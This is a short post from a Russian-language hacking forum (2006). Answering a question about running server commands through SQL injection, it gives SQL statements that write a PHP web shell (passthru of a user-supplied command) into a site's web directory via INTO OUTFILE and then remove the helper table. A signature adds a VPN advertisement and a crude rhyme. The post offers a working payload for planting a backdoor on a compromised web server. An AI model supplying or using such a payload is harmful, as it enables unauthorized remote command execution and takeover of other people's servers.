Показать сообщение отдельно

  #4  
Старый 27.04.2006, 13:14
m0nzt3r
ветеран
Регистрация: 22.06.2004
Сообщений: 2,128
Провел на форуме:
5355463

Репутация: 2258


По умолчанию

Цитата:
Сообщение от NeX  
Вот ща еще мысль пришла! Как выполнить команду на сервере (допустим ls -al) посредством sql инъекции и возможно это вообще?
Для этого есть поиск.Вот код:
Код:
CREATE TABLE `shell` (s TEXT);
INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
SELECT `s` INTO OUTFILE '/полный/путь/к/сайту/шелл.php' FROM `shell`;
DROP TABLE `shell`;
Закрыта.
__________________
Elite VPN from Green. Quality. Click and buy!!!

Моня тот еще зверюга,
Свиду тихий внутри - ****,
Без обид,реальный мэн,
Просто рифмы нет совсем.
С ним шутить *****то очень,
В ирце вместе с ним хохочем (c) m0Hze